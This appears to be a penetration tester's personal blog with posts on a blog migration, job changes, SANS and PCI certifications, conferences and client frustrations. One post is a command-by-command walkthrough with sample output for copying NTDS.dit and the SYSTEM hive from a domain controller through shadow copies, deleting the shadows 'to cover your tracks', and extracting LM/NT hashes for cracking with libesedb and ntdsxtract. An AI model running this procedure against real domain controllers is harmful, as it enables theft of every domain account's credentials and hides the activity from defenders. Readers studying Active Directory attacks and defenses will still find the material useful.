Moving from WordPress to Blogger Hassles

Have been attempting to move from WordPress to Blogger, and failing miserably at it.

There seem to be no useful tools still available that will parse the WordPress export into a usable file to import into Blogger. At one time there were several tools, and many sites to assist with this. I guess those days are gone; many of the tools are no longer available or working.

Downloaded several scripts that claim to convert the data to the correct format, and all have failed me. Tried some websites, and they all barf on me, complaining that my file is either in the wrong format or too large.

So far I have moved one article over; with all the format changes needed, it took me about an hour to get it into a readable state.

Moving articles over one at a time is time consuming, so I guess I will only move the important ones over and trash the others.

Starting a new Job

I have Left Sword & Shield to take a better opportunity with Coalfire Systems.
There were multiple reasons for leaving Sword & Shield, and most of them are related to one individual who has moved up the ranks in the company. He was originally hired to do report reviews five years ago, and is now the Senior VP of services. Since his move into management there has been a drastic exodus of highly qualified personnel from the company. One major issue is that the CEO/President, Executive VP, and COO do not even notice the main reason for the high personnel turnover.
Since I turned in my notice, the CEO and COO have completely ignored me. Walking down the hallway, I always say hello to everyone, and usually get a hello back from whoever is there. Not lately; I have had multiple encounters with the C suite, and they literally walk past me as if I were not there.
I wish all my former colleagues well in their endeavors and hope things get better.

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I am currently splitting my time between penetration testing and QSA work. It has not been an easy process working for two bosses with different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well, since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customer doing PCI work. It rarely works out in my favor, and makes for long hours with no compensation for them.
My boss's boss (our COO) said that on Jan 1, 2016 I will move over to the PCI group, but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill my spot on the team, but another person left in November, leaving another shortage. The interesting thing is that this same issue with moving groups is the reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:\>vssadmin list shadows
Example: ‘vssadmin list shadows’ with no shadows available:
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\>vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ output:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOWCOPY DISK>\windows\<directory>\<file> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)
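If you end up scripting this step, the newest shadow copy volume name can be pulled out of the vssadmin output rather than eyeballed. A rough Python sketch, assuming output shaped like the examples above (the helper name and the sample text are illustrative, not verbatim vssadmin output):

```python
import re

def latest_shadow_volume(vssadmin_output):
    """Return the last (newest) shadow copy volume name listed.

    Matches both 'Shadow Copy Volume:' (list shadows) and
    'Shadow Copy Volume Name:' (create shadow) style lines.
    """
    volumes = re.findall(r"Shadow Copy Volume(?: Name)?:\s*(\S+)",
                         vssadmin_output)
    return volumes[-1] if volumes else None

# Illustrative sample modeled on 'vssadmin list shadows' output
sample = r"""
   Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
   Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
"""

print(latest_shadow_volume(sample))
# prints the HarddiskVolumeShadowCopy2 path (the last one listed)
```

The copy commands above can then be built from the returned volume name.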

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case; I have had a couple of occasions where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
• libesedb
• ntdsxtract
libesedb
Download libesedb: (Use whichever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
Running esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsusers.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from the system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user; the number of hashes per user will vary based on the domain's password history settings)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need, it is time to start cracking passwords to get to that data you wanted…
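Before feeding the output files to a cracker, it can be worth a quick sanity check on what you pulled. A minimal Python sketch that parses john-format NT hash lines like the ones above and counts unique hashes (a shared hash means a shared password); the alice/bob/carol lines are made-up sample data, not output from a real domain:

```python
# Minimal sketch: parse john-format NT hash lines like
#   name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
# and report accounts plus unique hash count.
def parse_nt_lines(lines):
    entries = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        user, hashval = line.split(":", 2)[:2]
        if hashval.startswith("$NT$"):
            hashval = hashval[len("$NT$"):]
        # NT hashes are hex; normalize case before comparing
        entries.append((user, hashval.lower()))
    return entries

# Made-up sample data in the format shown above
sample = [
    "alice:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::",
    "bob:$NT$2C8F14B95129B6EB77B1F69D04FF4000:::",
    "carol:$NT$e4c3436ddd1f625c6fede0fa5525f000:::",
]

entries = parse_nt_lines(sample)
unique = {h for _, h in entries}
print(len(entries), "accounts,", len(unique), "unique hashes")
# prints: 3 accounts, 2 unique hashes
```

In practice you would read the lines from the --ntoutfile output instead of the sample list.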

PCI-QSA Training

Spent the past 2 days in Boston in the PCI-QSA training class. We took the exam during the last hour and a half of the class, but will not know the results until a week or two later. The class was interesting, and I learned a bit from the instructor's perspective on doing assessments. I met several interesting people from all over the world, working for different companies. I thought it very interesting talking to the people working for the accounting firms about how they were using the QSA certification with their clients. Most of them were doing just gap analysis and not actually signing ROCs for clients.
Well hope to hear if I passed….  

Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. I procrastinated for several months before finally breaking down and taking the certification exam before my window expired in late April 2015.
Spent a few days going over the books to refresh myself on the content we covered, and took one of the practice exams; I actually did not do too well on it. Never having taken a SANS cert before, I was not sure what to expect, and probably should have allowed the full 2 hours to sit the practice test. I rushed through it, guessed on a lot of the questions, and did not remember going over half of the info. (Note to self: actually read the questions and each answer, and not just say that looks good.) Overall I was a little frustrated after the first practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion and not actual facts. Several of the questions had more to do with general penetration testing than actual web application testing, like needing to know the TTL from a DNS request for a domain name.
So I read the books a few more days before taking the second practice test, which I did much better on, since I had some idea of what to expect. I did rush through it again, finishing the entire test in 48 minutes. That is really not that great, but I just wanted to make sure I had some idea what the real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question thoroughly.
Sat for the exam on April 9, 2015. Finished the test and passed it fairly easily, but was somewhat perplexed that it had nothing similar to the practice tests. It seemed the practice exams had nothing to do with the actual exam. Many of the questions were topics that were in the books but never brought up in the practice tests. That frustrated me a little, since I had to spend more time looking for some of the answers I had not really gone over previously.
So for anyone planning on sitting the exam who has not taken a SANS cert before: plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will prepare you for the real test; they might actually make you study information that is never asked on the exam.

Moving to Google Domains from 1and1.com

Well, I am moving some of my domains away from 1and1.com hosting to the beta Google Domains. It has not been the easiest thing to do. I unlocked my domains and disabled private registration; however, several domains were still locked an hour after changing their status. All of them were finally released to allow me to request the transfer to Google.
One main reason I am moving from 1and1.com is that they continually raise their prices, and I am not a business, so I do not make money from any of my sites. The other is that their mail services have become awful, unless you want to move to their newer Exchange mail service for a $5 per account, per month fee.
I have used them for about eight years, and originally started with their beginner package for $2.99 per month, but it is now up to $4.99 per month. While they do add some features, it seems that they make others worse for the older subscribers who do not upgrade to a better package.
The new MyWebsite package is $6.99 a month, with a few more options than I currently have, and I am guessing that my account will soon receive a price update to be closer to that price. Along with that, the domain names I have registered used to cost me between $6.99 and $8.99, and are now all $14.99 per domain. Since I have 17 domains, that has made a drastic increase in my costs to host websites. Another thing that pissed me off: they sent a notice that they were discontinuing the use of PHP 5.2, so I migrated all of my systems to 5.4 or 5.5. They forgot to mention that I needed to discontinue the support for 5.2 in my billing, and billed me $4.99 for a month of support. They never mentioned that I had to do this, or that it was added to my billing and I would have to remove it myself.
I have always had an issue with 1and1.com's limited MySQL DB support; only allowing 100MB of data in one database is a little crappy. Especially when I can have a bunch of DB instances but only 100MB in each one, it makes it a pain to have to program a web site to use multiple DB instances.
Transferred nine domains and was notified that it takes 5 days for 1and1.com to transfer a domain to the new provider; they state that: “1&1 will release the domain after five(5) days as required by ICANN if there are no restrictions, disputes, etc.” I guess I will have to wait and see how things will be at Google, and it will give me some time to figure out what I want to point the domain names to. I have moved one to a Bitbucket repo already, and will just keep it pointed there once it is moved.
Will see how things go. I still need to move six more domains, but they are all used for email, and I am not sure how long the outage will be on them. I will have to test one to see how things go and what the email outage will be. Then I have one that is tied to the main account for 1and1.com, and I am not sure how the transfer will work since it is tied to the hosting package. It is also the domain hosting this blog, so I will need to figure out where to host this site with access to PHP and MySQL, to allow me to host a couple of web applications.

SANS SEC 542 – Washington DC CDI

Attended SANS SEC 542 Web App Penetration Testing and Ethical Hacking class in Washington DC at the Grand Hyatt from December 12 – 17 2014.
The instructor was Eric Conrad, and the class was fairly decent; it is a good start for anyone wanting to learn web application pentesting. I already had some extensive knowledge of web app testing, but decided to take the course anyway to see what SANS courses were like.
Learned a few things, but I already knew most of the course material; most of the new things I learned were tool related. I do not usually use ZAP or w3af, and since we used them in class I learned a few things about them and their capabilities.
There was a wide variety of people in the class, with about 30 students in the classroom and about 15 online. We had some with no pentesting experience, and some with a couple years of experience.
The class was a six day course:
      DAY 1 : Attacker’s View, Pentesting and Scoping
      DAY 2 : Recon & Mapping
      DAY 3 : Discovery
      DAY 4 : Discovery Continued
      DAY 5 : Exploitation
      DAY 6 : Capture the Flag
My team completed the CTF first, but Eric Conrad could not decide who yelled out first so he called it a tie with the team sitting just behind us.
The biggest things I learned from the class were actually not taught in the classroom; they came from talking to the people there who do pentesting and work in the security community. Plus, the additional talks held after classes were well worth staying up late and not going sightseeing around DC.
Now I just need to figure out how to get my boss to allow me to attend another one next year.

Derbycon 4.0

Well Derbycon 4.0 is over, and now things have to go back to normal.
My boss has already scheduled me on 3 new projects, and I have not finished last week's projects because I was too excited to get to Derbycon.
Completed the Urban Bourbon Trail (all in half a day, which I do not recommend unless you have the full day). Started at 2pm on Thursday after arriving at the Hyatt in Louisville, KY, and was done by 8pm that night. I felt terrible most of Friday morning, but that did not stop me from getting in on the CTF.
Had a blast at Derbycon, spent most of my time playing CTF and hanging out with friends.
Team nanerpwn came in 2nd place in the CTF, and we had a good lead for most of the time on Friday and Saturday. We could not hold on to the lead towards the end, since a few people dropped off to head back home early. So maybe next year we will come in 1st, if we can get everyone to stay until Sunday afternoon.
Ready for Derbycon 5.0

Bahrain – Working for another manager is trying my patience

Well I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people, they are great and were a joy to work with.
As for the project that my company is contracted on, I am a little pissed that nothing has really been done since I left the last time I worked over here; well, none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish, their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.
The two people that were hired to come over here and work for the last year, who are not security minded people by the way, did almost nothing during their time here. From what I can tell, it looks like they relied on other vendors to do most of the work and took all of the credit for it. Most of the projects have not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks; there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and only two workstations are locked down. The manager believes that all systems have the software installed and are completely protected; I tried to let him know, and he did not seem to want to hear it. I dropped the conversation and began working on a solution to the issue.
I am ready to get back to pentesting, where I can actually do some good; well, I will keep telling myself that. Many of my customers just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.